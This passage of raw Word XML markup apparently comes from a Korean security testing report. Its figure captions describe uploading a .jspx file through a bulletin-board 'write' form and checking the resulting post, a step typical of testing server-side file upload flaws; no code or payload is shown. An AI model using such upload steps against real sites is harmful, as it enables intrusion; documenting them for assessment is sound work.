                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1752946</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1355262</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1226128" cy="200891"/>
                <wp:effectExtent l="0" t="0" r="12700" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394027" name="직사각형 1444394027"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1226128" cy="2008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AC6C5" id="직사각형 1444394027" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:138.05pt;margin-top:106.7pt;width:96.55pt;height:15.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AuAIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvND9sSzdqtlq1WoRU&#10;tRUt6tnr2JtIjm1s72aXW3kHJN6ACweeC5V3YGwn6apUHBA5OLZn5hvPNz8np9tWoA0ztlGyxNlB&#10;ihGTVFWNXJX4w+3i1TFG1hFZEaEkK/GOWXw6e/nipNMFy1WtRMUMAhBpi06XuHZOF0liac1aYg+U&#10;ZhKEXJmWODiaVVIZ0gF6K5I8TY+STplKG0WZtXB7HoV4FvA5Z9RdcW6ZQ6LE8DYXVhPWpV+T2Qkp&#10;VobouqH9M8g/vKIljQSnI9Q5cQStTfMHVNtQo6zi7oCqNlGcN5SFGCCaLH0SzU1NNAuxADlWjzTZ&#10;/wdLLzfXBjUV5G4ymbyeTtL8DUaStJCrh2/3D5+///xx/+vrF7QnBs46bQswvdHXpj9Z2HoCtty0&#10;/g+hoW3geTfyzLYOUbjM8vwoy6EyKMggi8fTzCciebTWxrq3TLXIb0psII+BXrK5sC6qDiremVSL&#10;Rgi4J4WQqAMP0/QwDRZWiabyUi+0ZrU8EwZtCJTDYpHC1zveU4NnCAmv8THGqMLO7QSLDt4zDoxB&#10;HHn04GuVjbCEUiZdFkU1qVj0drjvbLAIMQsJgB6ZwytH7B5g0IwgA3ZkoNf3piyU+mjch/4349Ei&#10;eFbSjcZtI5V5LjIBUfWeo/5AUqTGs7RU1Q7qyajYaFbTRQMZvCDWXRMDnQU9CNPCXcHChYJMqX6H&#10;Ua3Mp+fuvT4UPEgx6qBTS2w/rolhGIl3ElphCqXpWzscJodvcjiYfclyXyLX7ZmC7GcwlzQNW6/v&#10;xLDlRrV3MFTm3iuIiKTgu8TUmeFw5uIEgbFE2Xwe1KCdNXEX8kZTD+5Z9RV6u70jRvdl7KABLtXQ&#10;1aR4Us1R11tKNV87xZtQ6o+89nzDKAiF048tP2v2z0HrcbjOfgMAAP//AwBQSwMEFAAGAAgAAAAh&#10;APOWiu3gAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj01PhDAQhu8m/odmTLy5hYqwImWjJsa4&#10;8aCr3ru0C2TbKaFdwH/veNLbfDx555lqszjLJjOG3qOEdJUAM9h43WMr4fPj6WoNLESFWlmPRsK3&#10;CbCpz88qVWo/47uZdrFlFIKhVBK6GIeS89B0xqmw8oNB2h386FSkdmy5HtVM4c5ykSQ5d6pHutCp&#10;wTx2pjnuTk7Cmz8euP0SYls8PIvixa3ndnqV8vJiub8DFs0S/2D41Sd1qMlp70+oA7MSRJGnhFKR&#10;XmfAiMjyWwFsT5PsJgFeV/z/D/UPAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGzD6MC4&#10;AgAApAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAPOW&#10;iu3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801600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C54D035" wp14:editId="6BFC9990">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2618854</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1554479</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1711037" cy="2578620"/>
                <wp:effectExtent l="0" t="0" r="60960" b="50800"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394026" name="직선 화살표 연결선 1444394026"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1711037" cy="2578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7ED71" id="직선 화살표 연결선 1444394026" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:206.2pt;margin-top:122.4pt;width:134.75pt;height:203.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fRJQIAAFgEAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNEm32+5GTffQpVwQ&#10;VPw8gOvYiSXHtmzTtEcQL4CEhFbiwI3rCvFUqPsOjJ00u/wICUQOTuyZ75uZb8aZX+waibbMOqFV&#10;gbNRihFTVJdCVQV++WL14Awj54kqidSKFXjPHL5Y3L83b03OxrrWsmQWAYlyeWsKXHtv8iRxtGYN&#10;cSNtmAIj17YhHra2SkpLWmBvZDJO02nSalsaqylzDk4vOyNeRH7OGfVPOXfMI1lgyM3H1cZ1E9Zk&#10;MSd5ZYmpBe3TIP+QRUOEgqAD1SXxBL2y4heqRlCrneZ+RHWTaM4FZbEGqCZLf6rmeU0Mi7WAOM4M&#10;Mrn/R0ufbNcWiRJ6N5lMTs4n6XiKkSIN9Orw+fXh7Sd0c/X+8ObrzbuP6PDh+tuX63B2xxkUbI3L&#10;gWip1rbfObO2QY4dt014Q6FoF1XfD6qznUcUDrNZlqUnM4wo2Mans7PpOPYluYUb6/wjphsUPgrs&#10;vCWiqv1SKwUd1jaL2pPtY+chAQAeASG2VKiFKOfpaRrdnJaiXAkpg9HZarOUFm0JDMhqlcITZgIo&#10;fnDzRMiHqkR+b0AYbwVRlWS9p1QACBp0Vccvv5esC/6McdA31NlFD5PNhpCEUqZ8NjCBd4BxSG8A&#10;9mn/Cdj7ByiLU/834AERI2vlB3AjlLa/S9vvjinzzv+oQFd3kGCjy32chygNjG9Utb9q4X7c3Uf4&#10;7Q9h8R0AAP//AwBQSwMEFAAGAAgAAAAhACtQKZjgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j8FOwzAMhu9IvENkJG4sbVWmrWs6oQoQBy4dCLFb1pi2onGqJNvK22NO7GbLvz5/f7md7ShO6MPg&#10;SEG6SEAgtc4M1Cl4f3u6W4EIUZPRoyNU8IMBttX1VakL487U4GkXO8EQCoVW0Mc4FVKGtkerw8JN&#10;SHz7ct7qyKvvpPH6zHA7yixJltLqgfhDryese2y/d0erIPuQ+88X2QxT09ZYD6/WP5pnpW5v5ocN&#10;iIhz/A/Dnz6rQ8VOB3ckE8SoIE+znKMMy3PuwInlKl2DOPBwn6xBVqW87FD9AgAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhAMBuF9ElAgAAWAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhACtQKZjgAAAACwEAAA8AAAAAAAAAAAAAAAAAfwQAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACMBQAAAAA=&#10;" strokecolor="red" strokeweight="1.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57D3CC06" wp14:editId="549C21F2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2722765</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>960409</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="436418" cy="394854"/>
                <wp:effectExtent l="38100" t="0" r="20955" b="62865"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394025" name="직선 화살표 연결선 1444394025"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="436418" cy="3948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405CC" id="직선 화살표 연결선 1444394025" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:214.4pt;margin-top:75.6pt;width:34.35pt;height:31.1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knKgIAAGAEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMuO0zAU3SPxD5b3NGknHc1UTWfRobBA&#10;UPH4ANexE0t+yTZNuwTxA0hIaCQW7NiOEF+FOv/AtZOGGRALEF1YsX3Pueeee935xU5JtGXOC6NL&#10;PB7lGDFNTSV0XeJXL1cPzjDygeiKSKNZiffM44vF/Xvz1s7YxDRGVswhINF+1toSNyHYWZZ52jBF&#10;/MhYpuGSG6dIgK2rs8qRFtiVzCZ5fpq1xlXWGcq8h9PL7hIvEj/njIZnnHsWkCwxaAtpdWndxDVb&#10;zMmsdsQ2gvYyyD+oUERoSDpQXZJA0GsnfqNSgjrjDQ8jalRmOBeUpRqgmnH+SzUvGmJZqgXM8Xaw&#10;yf8/Wvp0u3ZIVNC7oihOzot8MsVIEwW9Onx5c3j3Gd1cfTi8/Xbz/hM6fLz+/vU6nt0KBgdb62dA&#10;tNRr1++8Xbtox447hbgU9jEkSAZByWiX/N8P/rNdQBQOi5PTYgwDQ+EKpJxNi9ifrKOJdNb58IgZ&#10;heJHiX1wRNRNWBqtodPGdSnI9okPHfAIiGCpUQsqzvNpnpR4I0W1ElLGS+/qzVI6tCUwKKtVDr8+&#10;952wQIR8qCsU9hYMCk4QXUvWR0oNYqMXXfXpK+wl65I/Zxx8hio7kWnC2ZCSUMp0GA9MEB1hHOQN&#10;wF52fBp/AvbxEcrS9P8NeECkzEaHAayENq4z7W72sDtK5l380YGu7mjBxlT7NBfJGhjj1NH+ycV3&#10;cnuf4D//GBY/AAAA//8DAFBLAwQUAAYACAAAACEAvl4Frd8AAAALAQAADwAAAGRycy9kb3ducmV2&#10;LnhtbEyPQU+DQBSE7yb+h80z8WYXkGpLWRrTaOq1tT9gy74CgX2L7FLov/d50uNkJjPf5NvZduKK&#10;g28cKYgXEQik0pmGKgWnr4+nFQgfNBndOUIFN/SwLe7vcp0ZN9EBr8dQCS4hn2kFdQh9JqUva7Ta&#10;L1yPxN7FDVYHlkMlzaAnLredTKLoRVrdEC/UusddjWV7HK2Ccr837dxPp+92TLuDfL+t48+dUo8P&#10;89sGRMA5/IXhF5/RoWCmsxvJeNEpSJMVowc2lnECghPp+nUJ4qwgiZ9TkEUu/38ofgAAAP//AwBQ&#10;SwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlw&#10;ZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVs&#10;cy8ucmVsc1BLAQItABQABgAIAAAAIQBErDknKgIAAGAEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMv&#10;ZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC+XgWt3wAAAAsBAAAPAAAAAAAAAAAAAAAAAIQEAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAkAUAAAAA&#10;" strokecolor="red" strokeweight="1.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29B2761C" wp14:editId="04CF2BD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3226550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>840855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="318654" cy="173182"/>
                <wp:effectExtent l="0" t="0" r="24765" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394024" name="직사각형 1444394024"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="31865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345FC" id="직사각형 1444394024" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:254.05pt;margin-top:66.2pt;width:25.1pt;height:13.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TRtgIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdp0p9VN1XUKgip&#10;aiNa1LPjtbMreT3Gdv64lXdA4g24cOC5UHkHxt6fRqXigMjB8ezMfOP55ufsfFsrshbWVaBzOjhI&#10;KRGaQ1HpZU4/3M3enFDiPNMFU6BFTnfC0fPJ61dnG5OJIZSgCmEJgmiXbUxOS+9NliSOl6Jm7gCM&#10;0KiUYGvmUbTLpLBsg+i1SoZpepRswBbGAhfO4dfLRkknEV9Kwf2NlE54onKKb/PxtPFchDOZnLFs&#10;aZkpK94+g/3DK2pWaQzaQ10yz8jKVn9A1RW34ED6Aw51AlJWXMQcMJtB+iyb25IZEXNBcpzpaXL/&#10;D5Zfr+eWVAXWbjQaHZ6O0uGIEs1qrNXjt4fHz99//nj49fUL2VMjZxvjMnS9NXPbSg6vgYCttHX4&#10;x9TINvK863kWW084fjwcnByNMQxH1eAYpWGoQ/LkbKzzbwXUJFxyarGMkV22vnK+Me1MQiwNs0op&#10;/M4ypckGQU/TcRo9HKiqCNqgdHa5uFCWrBl2w2yW4q8NvGeGz1AaXxNSbJKKN79TognwXkgkDNMY&#10;NhFCq4oelnEutB80qpIVook23g/WecSclUbAgCzxlT12C9BZNiAddsNAax9cRez03rlN/W/OvUeM&#10;DNr3znWlwb6UmcKs2siNfUdSQ01gaQHFDtvJQjNnzvBZhRW8Ys7PmcXBwhHEZeFv8JAKsFLQ3igp&#10;wX566Xuwx35HLSUbHNScuo8rZgUl6p3GSTjFzgyTHYXR+HiIgt3XLPY1elVfAFZ/gGvJ8HgN9l51&#10;V2mhvsedMg1RUcU0x9g55d52woVvFghuJS6m02iG02yYv9K3hgfwwGro0LvtPbOmbWOP/X8N3VCz&#10;7Fk3N7bBU8N05UFWsdWfeG35xk0QG6fdWmHV7MvR6mm3Tn4DAAD//wMAUEsDBBQABgAIAAAAIQAf&#10;kMA74AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqFOXkBDiVICEEBUL&#10;aMvejadJVD+i2E3C3zOsYDlzj+6cKdezNWzEIXTeSVguEmDoaq8710jY715ucmAhKqeV8Q4lfGOA&#10;dXV5UapC+8l94riNDaMSFwoloY2xLzgPdYtWhYXv0VF29INVkcah4XpQE5Vbw0WS3HGrOkcXWtXj&#10;c4v1aXu2Ej786cjNlxCb7OlVZG82n5rxXcrrq/nxAVjEOf7B8KtP6lCR08GfnQ7MSEiTfEkoBStx&#10;C4yINM1XwA60Se8z4FXJ//9Q/QAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDIoyTRtgIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAfkMA7&#10;4AAAAAsBAAAPAAAAAAAAAAAAAAAAABAFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAFCC69" wp14:editId="1AD1924D">
            <wp:extent cx="4572000" cy="4596730"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
            <wp:docPr id="11435927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2796" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId80"/>
                    <a:srcRect l="35509" t="26894" r="35554" b="18339"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="459673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49D827" w14:textId="27D2A0FE" w:rsidR="00D11617" w:rsidRDefault="003543E2" w:rsidP="00D11617">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="_Toc20909464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74</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000026D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000026D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="000026D3">
        <w:t xml:space="preserve">spx </w:t>
      </w:r>
      <w:r w:rsidR="000026D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일 업로드</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="6D203928" w14:textId="77777777" w:rsidR="00D11617" w:rsidRDefault="00D11617" w:rsidP="00D11617">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC9E39F" w14:textId="3AD49409" w:rsidR="00E73B68" w:rsidRDefault="00943D6B" w:rsidP="00D11617">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251816960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="083FDE63" wp14:editId="74E65A7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4653338</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3058160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="415059" cy="207818"/>
                <wp:effectExtent l="0" t="0" r="23495" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394030" name="직사각형 1444394030"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="415059"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BDE3" id="직사각형 1444394030" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:366.4pt;margin-top:240.8pt;width:32.7pt;height:16.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0YuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdpQptVN1XUKgip&#10;aita1LPjtbMreT3Gdv64lXeoxBtw4cBzofIOjL0/jUrFAbEHr+2Z+cbzzc/J6bZWZC2sq0DndHCQ&#10;UiI0h6LSy5x+vJ2/OabEeaYLpkCLnO6Eo6fT169ONiYTQyhBFcISBNEu25iclt6bLEkcL0XN3AEY&#10;oVEowdbM49Euk8KyDaLXKhmm6dtkA7YwFrhwDm/PGyGdRnwpBfdXUjrhicopvs3H1cZ1EdZkesKy&#10;pWWmrHj7DPYPr6hZpdFpD3XOPCMrW/0BVVfcggPpDzjUCUhZcRFjwGgG6bNobkpmRIwFyXGmp8n9&#10;P1h+ub62pCowd6PR6HAySg+RJs1qzNXjt/vHL99//rj/9fWB7ImRs41xGZremGvbnhxuAwFbaevw&#10;x9DINvK863kWW084Xo4G43Q8oYSjaJgeHQ+OQx6SJ2NjnX8noCZhk1OLaYzssvWF841qpxJ8aZhX&#10;SuE9y5QmG4xlko7TaOFAVUWQBqGzy8WZsmTNsBrm8xS/1vGeGj5DaXxNCLEJKu78TonGwQchkTAM&#10;Y9h4CKUqeljGudB+0IhKVojG23jfWWcRY1YaAQOyxFf22C1Ap9mAdNgNA61+MBWx0nvjNvS/GfcW&#10;0TNo3xvXlQb7UmQKo2o9N/odSQ01gaUFFDssJwtNnznD5xVm8II5f80sNhbWFg4Lf4WLVICZgnZH&#10;SQn280v3QR/rHaWUbLBRc+o+rZgVlKj3GjthgpUZOjseRuOjIR7svmSxL9Gr+gww+wMcS4bHbdD3&#10;qttKC/UdzpRZ8Ioipjn6zin3tjuc+WaA4FTiYjaLatjNhvkLfWN4AA+shgq93d4xa9oy9lj/l9A1&#10;NcueVXOjGyw1zFYeZBVL/YnXlm+cBLFw2qkVRs3+OWo9zdbpbwAAAP//AwBQSwMEFAAGAAgAAAAh&#10;AG9nfkbhAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoE7c0IcSpAAkh&#10;EAco7d2Nt0lUex3FbhL+HnOC42hGM2/KzWwNG3HwnSMJ6SIBhlQ73VEjYff1fJMD80GRVsYRSvhG&#10;D5vq8qJUhXYTfeK4DQ2LJeQLJaENoS8493WLVvmF65Gid3SDVSHKoeF6UFMst4aLJFlzqzqKC63q&#10;8anF+rQ9Wwkf7nTkZi/EW/b4IrJXm0/N+C7l9dX8cA8s4Bz+wvCLH9GhikwHdybtmZGQLUVEDxJW&#10;eboGFhPZXS6AHSTcpqsl8Krk/z9UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDTx20Y&#10;uAIAAKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBv&#10;Z35G4QAAAAsBAAAPAAAAAAAAAAAAAAAAABIFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E73B68" w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5574E156" wp14:editId="4429F79A">
            <wp:extent cx="4572000" cy="3290066"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="8224892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9264" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId81"/>
                    <a:srcRect l="25346" t="28885" r="23838" b="2280"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3290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3A6650" w14:textId="68B1920E" w:rsidR="00C4711D" w:rsidRDefault="00E73B68" w:rsidP="00C4711D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="447" w:name="_Toc20909464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75</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>작성하기</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클</w:t>
      </w:r>
      <w:r w:rsidR="00C4711D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="3910364C" w14:textId="345CF231" w:rsidR="00C4711D" w:rsidRDefault="00C4711D" w:rsidP="00C4711D">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00456990">
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:eastAsia="굴림" w:hAnsi="굴림"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F56DB7D" wp14:editId="190C9D66">
            <wp:extent cx="4572000" cy="1477049"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="1870926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6775" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId36"/>
                    <a:srcRect l="22318" t="56564" r="23279" b="10351"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1477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B9481F" w14:textId="06993B6C" w:rsidR="009073F7" w:rsidRDefault="00C4711D" w:rsidP="009073F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc209094649"/>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76</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>작성된 게시물 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w14:paraId="47CD57C5" w14:textId="77777777" w:rsidR="009073F7" w:rsidRDefault="009073F7" w:rsidP="009073F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165CC7E7" w14:textId="3FC1F936" w:rsidR="009073F7" w:rsidRDefault="009073F7" w:rsidP="009073F7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251836416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03D5A3DB" wp14:editId="13FF0C5A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3900402</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>435668</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1627620" cy="187036"/>
                <wp:effectExtent l="0" t="0" r="10795" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394033" name="직사각형 1444394033"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
